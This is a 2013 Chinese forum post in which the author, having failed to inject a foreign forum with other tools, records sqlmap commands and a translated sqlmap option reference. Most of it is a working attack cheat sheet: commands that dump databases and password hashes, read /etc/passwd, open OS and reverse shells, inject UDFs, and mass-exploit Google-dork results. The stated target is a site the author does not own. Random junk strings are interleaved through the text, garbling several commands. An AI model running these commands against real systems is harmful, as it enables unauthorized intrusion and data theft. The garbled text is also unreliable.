今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、+ a1 D/ \, y; C
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称0 T. D- P$ t( X5 `6 E
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名
' E) b% J& Y( ]7 u/ z9 Isqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
* ?, }" U4 n4 Z g- U1 g
3 h* q& R! d+ s+ A) B+ q) psqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v2 k; r% v7 s8 i, L
0 #获取字段内容
* _3 j0 d$ N) \5 w9 I, y
9 w( C6 u! G& m" H: X$ f******************信息获取******************; L& ^7 l7 w g1 C+ E6 o7 i
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
+ J" ?; X$ v; `7 Y& hsqlmap -u “http://url/news?id=1″ –users #列数据库用户! B1 U0 L) {7 S% q
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
+ [9 J3 b0 ?. O/ u. Qsqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码( X4 H0 {( A* O# k! u. R3 g
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码4 S' X0 v% w6 l7 X4 O5 k0 c n9 s+ A
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”) `' n! x6 d6 {* h3 W" ?7 ]* u- `7 F
–start 1 –stop 20 #列出指定字段,列出20 条" S; Q+ ?- s3 a1 h% L" t% W7 G! \
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
7 e- v' c9 t! g3 ^" ~% ksqlmap -u “http://url/news?id=1″ –privileges #查看权限
0 S0 N, N4 W8 Q' Msqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
% g N6 g2 X! asqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)* p+ j' [" ^1 R/ O
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
1 z7 B. w& w! k* Q1 P9 T) Tsqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录6 t8 M! d3 E% ?- Z" ^4 V, B* v; y
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
2 m' N* h$ x* z- ?sqlmap -u “http://url/news?id=1″-b #获取banner信息
3 H" q; A0 q3 r9 ]sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入, Z) t6 X o0 j- H
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型" t1 ~& b% |' w& w8 [
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
: v5 T9 ]+ X2 M$ U; I/ T% d6 }+ {sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词
; P0 {: @5 @% ]+ _$ rsqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令" y" ^" ]/ J9 F
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
2 d5 E5 c. Y( i1 w' S) l( tsqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令: c( o& r& M# k. x% E6 M
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
' n9 e+ {; b/ lsqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表0 F( _9 D. H" n, e5 d, J* y) T
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
; L) k% v& T% N! V8 [8 v2 @sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
+ G, C( Z& A8 E. @- t8 u* A5 {***********高级用法*************; I M& _8 b. W
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入0 B2 ?. ~7 U" [) R: l, `- @
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问* @" R6 t9 F7 r# H" b) U
–technique 测试指定注入类型\使用的技术1 X4 L1 @% M* t2 J) x
不加参数默认测试所有注入技术% L5 Q/ B' u8 [) U4 e
• B: 基于布尔的SQL 盲注7 z' H9 K) R J7 q. f0 ?5 F8 D
• E: 基于显错sql 注入$ _' f2 \+ V: ~, z/ a5 l6 g4 T
• U: 基于UNION 注入
% D$ K2 W" E& a; W/ T1 z• S: 叠层sql 注入/ r# N! T K S5 T B8 M
• T: 基于时间盲注/ w5 b. Q/ Z3 c- U
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
3 c9 U7 d2 V. F; R5 X% S1 S3 F–tamper 插件所在目录
! L: c) z5 i: a1 P4 L( u0 K\sqlmap-dev\tamper
7 X/ p" m0 S1 g- i0 gsqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能
& `; T8 T3 g5 w/ ylevel 执行测试等级 攻击实例:
8 F2 I; y" ^$ a8 Z# l1 ?% kSqlmap -u “http://url/news?id=1&Submit=Submit”
1 k( d* S2 d) m) z) h7 A- Z( E* m–cookie=”PHPSESSID=41aa833e6d0d
" a7 | U# G7 D* p5 N% N28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user, G4 y8 E1 q- |# }# l
–password
* C# ?- |4 ]+ e4 u参考文档:http://sqlmap.sourceforge.net/doc/README.html
; c, F' t" G8 U: d***********安装最新版本*************
' K! k1 V- `% e# t: [ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版- }) c$ b+ X+ U( n0 {
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev3 @9 i. V7 B- u9 n
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
4 o0 Q) `2 }* Y( q. u. \sudo vim /home/当前用户/.bashrc
( b# a2 j( u$ S# g6 e7 X0 m#任意位置加上:+ h5 X* q- q/ M, E3 s# j E+ }
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效& V/ J k1 Y$ p6 W/ U! N
如果想对所有用户有效 可设置全局 编辑下面的文件- _- j; a4 O5 ]
vim /etc/profile
1 u! h6 [, y% E3 B, P$ J) z5 a同样加上:% R3 [& v- o+ H
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
! g1 e5 \ n/ y- l* \+ Z( k******************windows 7 (x64) sqlmap install (SVN)************
. l0 O1 @" G) D; m Chttp://www.python.org/getit/ 安装python2 d T! u$ E! r8 }4 ?1 Y* C2 s
http://www.sliksvn.com/en/download 安装windows svn client
5 N3 z* C+ l# U/ E2 psvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev3 x# J$ u8 |8 ]2 g% U
安装sqlmap( L& `6 T6 a. B. U9 L+ l4 _
*修改环境变量
$ A7 Q# ]/ D% @6 M8 q–version 显示程序的版本号并退出; l4 g6 F! e$ f$ ~9 b8 i; c
-h, –help 显示此帮助消息并退出8 G$ {. {2 n7 j% ]7 x- K. ?4 s
-v VERBOSE 详细级别:0-6(默认为1)4 [1 w4 o3 O! ?
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。/ l v9 y. k' ?% O' G
-d DIRECT 直接连接到数据库。
6 ^& P9 W3 v: ^' k( J2 U-u URL, –url=URL 目标URL。, E6 \1 p6 H$ b; R7 K; n+ w4 b
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。; L, _* p; M$ i" y6 @9 R9 |
-r REQUESTFILE 从一个文件中载入HTTP 请求。
6 a* S. m. O$ f7 U9 B7 k-g GOOGLEDORK 处理Google dork 的结果作为目标URL。1 G) n9 Z4 {& o9 r5 O2 s
-c CONFIGFILE 从INI 配置文件中加载选项。
# b$ s, T; M$ w& h" a6 H PRequest(请求)::1 `: c/ }. c) `2 ^# ^3 S1 Z
这些选项可以用来指定如何连接到目标URL。! J* [6 }0 K# E* c- Z
–data=DATA 通过POST 发送的数据字符串8 G3 z* q4 T( n( c% t6 r M
–cookie=COOKIE HTTP Cookie 头
$ w" Z7 I6 e2 U, R3 e–cookie-urlencode URL 编码生成的cookie 注入
7 W9 }3 ]6 }! q4 g' F/ N–drop-set-cookie 忽略响应的Set –Cookie 头信息
+ L' K; N8 ]% }+ ^- s " ? b) q7 D7 Q3 k1 u- t2 W5 N
–user-agent=AGENT 指定 HTTP User –Agent 头
7 G }5 b$ J! s/ X. _1 c% W( v" I–random-agent 使用随机选定的HTTP User –Agent 头
9 n1 \6 w3 l5 R: W3 Y1 l–referer=REFERER 指定 HTTP Referer 头
) N. P" R4 s o2 x–headers=HEADERS 换行分开,加入其他的HTTP 头
: y6 A v" S3 [8 W: q2 q+ B+ n9 `–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
5 B( X2 a. ]; x- ]0 e8 {* ^$ f7 R( W–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)( ~- n! M5 w* k( s0 v( G3 t n; ?( }# [
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)5 ~, o4 Z0 r6 v" E$ w$ \# A3 g- _4 S
–proxy=PROXY 使用HTTP 代理连接到目标URL) n9 n8 m" U6 |* L$ ^: [
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
( Y' u( Q5 R, z z9 @–ignore-proxy 忽略系统默认的HTTP 代理
4 ~; a: v8 [- P: C" Z) m–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
8 ?& B2 y7 {4 D5 Z+ s–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
7 \3 _! q5 m: Z: {/ s$ j' ] y' s" }5 _1 H–retries=RETRIES 连接超时后重新连接的时间(默认3)
' j$ U% Q. B3 A2 g2 _–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式! m2 I! N0 n& @$ s5 J
–safe-url=SAFURL 在测试过程中经常访问的url 地址7 A5 C* C; z: B& A$ ]
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL2 B" H: Y. A ?2 X, I# k, s7 R1 y% e4 r
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
9 r, W& A {! h( n/ I-o 开启所有优化开关' _& d9 v: t/ e
–predict-output 预测常见的查询输出 R/ Q3 B% s- T! t: o
–keep-alive 使用持久的HTTP(S)连接
+ c; D; c# v9 R–null-connection 从没有实际的HTTP 响应体中检索页面长度. h5 W) Q0 @( K4 P$ s6 r' l, W
–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)# i/ S- z) ^! V0 @
Injection(注入):" [% W; C. f- q+ h9 {
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
' h2 T" E+ E0 B( `) @-p TESTPARAMETER 可测试的参数(S)( m' Q; l% e* L( t& f4 }
–dbms=DBMS 强制后端的DBMS 为此值. r+ A7 _8 [$ o R! C u
–os=OS 强制后端的DBMS 操作系统为这个值8 l3 R' S. l; v
–prefix=PREFIX 注入payload 字符串前缀
% @2 W0 h1 S N" _ ?, Q–suffix=SUFFIX 注入 payload 字符串后缀( l) A- o0 d2 ?6 t9 S0 P' i& N4 H
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据+ C! V5 ^) U- X: s9 U
Detection(检测):
/ `2 C/ t( C1 m' c' c9 P% P/ J$ {这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
* t s% [2 n8 c+ P& O B9 P& D& I–level=LEVEL 执行测试的等级(1-5,默认为1)2 G$ e5 h" f+ _) P9 M8 R; g
–risk=RISK 执行测试的风险(0-3,默认为1)
" _! J* w/ u; S2 [–string=STRING 查询时有效时在页面匹配字符串) o; L% B( g" c% A
–regexp=REGEXP 查询时有效时在页面匹配正则表达式9 `+ G+ b7 m6 y6 b/ ]. @' Q
–text-only 仅基于在文本内容比较网页
0 C. S% j2 L2 U4 x$ VTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
$ h$ Q6 r; I/ |5 c–technique=TECH SQL 注入技术测试(默认BEUST). o3 Y( y/ p1 p7 v- h
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)! j4 b' Q- M0 l+ ^/ G' a
–union-cols=UCOLS 定列范围用于测试UNION 查询注入
( N7 ~9 E# A; K( D–union-char=UCHAR 用于暴力猜解列数的字符! t6 d2 j& T5 |% W5 h d! s
Fingerprint(指纹):, v+ M2 z- w' u) f# F
-f, –fingerprint 执行检查广泛的DBMS 版本指纹
3 c3 Y% G# Q9 ^Enumeration(枚举):* G- \7 D" _& V
5 w" s/ ^' ^+ M这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。- C0 r* V" q' o) C) n
-b, –banner 检索数据库管理系统的标识8 s* E. z- i) J, V- E
–current-user 检索数据库管理系统当前用户/ k/ z9 b) X% V
–current-db 检索数据库管理系统当前数据库* @& J. Y& f, J
–is-dba 检测DBMS 当前用户是否DBA
& ?7 I/ O- B3 m- E–users 枚举数据库管理系统用户
, _0 k$ |; k+ {–passwords 枚举数据库管理系统用户密码哈希
& W# u9 E0 y7 _- g–privileges 枚举数据库管理系统用户的权限/ P) \2 i$ E) s8 t+ d- t
–roles 枚举数据库管理系统用户的角色1 ]+ n, e+ O$ c: i- g+ f5 G
–dbs 枚举数据库管理系统数据库
8 t# z: n% N* g" ?: D–tables 枚举的DBMS 数据库中的表
! e. D, g3 X6 P, v* J- X( K–columns 枚举DBMS 数据库表列
& q, b; o/ N; m: O/ v–dump 转储数据库管理系统的数据库中的表项
9 I2 u1 ]4 K5 F! _( l–dump-all 转储所有的DBMS 数据库表中的条目
/ k# B, g: A9 L6 X x. w–search 搜索列(S),表(S)和/或数据库名称(S)7 w/ ]! N9 w" l9 X
-D DB 要进行枚举的数据库名
# r: \/ r4 A7 V- y0 O-T TBL 要进行枚举的数据库表+ v) N3 o ^; G( F1 @! ~
-C COL 要进行枚举的数据库列/ A N, S# L b; i! {& H
-U USER 用来进行枚举的数据库用户
7 o1 r. h1 e& j5 C" A–exclude-sysdbs 枚举表时排除系统数据库+ e% q9 ^, V; X5 \8 G
–start=LIMITSTART 第一个查询输出进入检索
) y3 W) S/ T+ m4 _–stop=LIMITSTOP 最后查询的输出进入检索" W# @ o! e2 g+ U2 h I0 R: H3 H
–first=FIRSTCHAR 第一个查询输出字的字符检索2 W0 e* @6 V" Q9 @" `* i0 Y8 c
–last=LASTCHAR 最后查询的输出字字符检索5 w" n/ r# s# R y' h
–sql-query=QUERY 要执行的SQL 语句8 }2 l8 N4 o, S [; z w- O
–sql-shell 提示交互式SQL 的shell- Y3 g+ s( i9 W
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
- \3 C& U4 E$ P* d6 v0 s" f–common-tables 检查存在共同表% Y: e0 E8 \' F3 W }. X0 D7 h
–common-columns 检查存在共同列
/ g5 `0 R9 ]. J6 Q$ c7 h' \' kUser-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
/ g' Z0 M$ X3 K–udf-inject 注入用户自定义函数1 }, K' K6 X3 p& t/ l
–shared-lib=SHLIB 共享库的本地路径0 z4 h8 O" L4 @+ J7 E
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
5 k/ S ]0 k5 D/ I; K! g3 |–file-read=RFILE 从后端的数据库管理系统文件系统读取文件( I# L* l& A9 O
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件: I9 T [, C9 k1 l7 B, K- Q) V
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径7 f9 l/ D2 D5 l+ L4 V
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。' N/ H* F7 N& q7 u3 Z4 s
–os-cmd=OSCMD 执行操作系统命令! w; q2 n! q6 F8 s$ d
–os-shell 交互式的操作系统的shell
6 Z8 Y- J+ a' ?2 ^–os-pwn 获取一个OOB shell,meterpreter 或VNC7 J2 g: g0 q& B+ ^ [; C7 E3 C
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC9 e; ^; Y0 U6 B/ H; @
–os-bof 存储过程缓冲区溢出利用
) Y n5 _3 F+ n. g( Y9 }/ I( f& R–priv-esc 数据库进程用户权限提升( N, U8 @+ D. B- |( B1 F; ?7 D" \
–msf-path=MSFPATH Metasploit Framework 本地的安装路径) N4 m0 H9 B" t @
–tmp-path=TMPPATH 远程临时文件目录的绝对路径; _# @1 l9 _, n6 I* h& B
7 o7 x" a- t( N+ E( O/ v0 @
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
' B3 D1 |) k' r9 n/ X$ A–reg-read 读一个Windows 注册表项值' s* Q: D& } b2 C4 I1 P+ a
–reg-add 写一个Windows 注册表项值数据
3 n& n9 i1 d% W% d5 Z4 @1 [/ Y( f–reg-del 删除Windows 注册表键值/ W8 l% M; |- `
–reg-key=REGKEY Windows 注册表键
% j7 A1 X' J# H3 u k; j( |3 E' M5 t. l–reg-value=REGVAL Windows 注册表项值
- \/ _# W& b9 J5 g+ Q, P( k4 Q7 H–reg-data=REGDATA Windows 注册表键值数据
" V( x) ]+ }1 h8 V–reg-type=REGTYPE Windows 注册表项值类型- a; @) M( p! @. Y' N: E8 K' ]
General(一般): 这些选项可以用来设置一些一般的工作参数。
4 I" R% q8 O0 o$ ~+ x+ O-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中6 i7 k6 Z! l- Q l$ m X
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
$ c" _% k) Q( s0 V–flush-session 刷新当前目标的会话文件, u+ ]1 I5 D+ [3 [& h
–fresh-queries 忽略在会话文件中存储的查询结果3 r+ d/ k+ P, t& Z4 r. r4 Q2 m
–eta 显示每个输出的预计到达时间- l3 h# d+ p ~3 W7 G
–update 更新SqlMap0 B9 {$ f/ y( F% F9 G& `
–save file 保存选项到INI 配置文件
+ {! o. ^# u ^–batch 从不询问用户输入,使用所有默认配置。1 j5 f! G# U$ d# y
Miscellaneous(杂项):! d6 z6 i/ i- j. c! V1 X
–beep 发现SQL 注入时提醒
0 ^+ c( ~' f1 U* D* J5 w- p–check-payload IDS 对注入payloads 的检测测试/ T4 y5 s% E: p% c6 y% K
–cleanup SqlMap 具体的UDF 和表清理DBMS
% O- V3 F$ E( v9 j–forms 对目标URL 的解析和测试形式6 {3 L, X4 ?5 w+ K
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果9 l& ]5 L" b" m5 ~; Q: X
–page-rank Google dork 结果显示网页排名(PR)( l' y, J5 Y6 e% h* M! \- N( x
–parse-errors 从响应页面解析数据库管理系统的错误消息3 G8 ]" L& C3 `6 ? {. \+ A
–replicate 复制转储的数据到一个sqlite3 数据库
1 }: X7 q5 T& y! w( {2 ]1 ?–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
' ]& V( A7 g1 ?. i! _–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对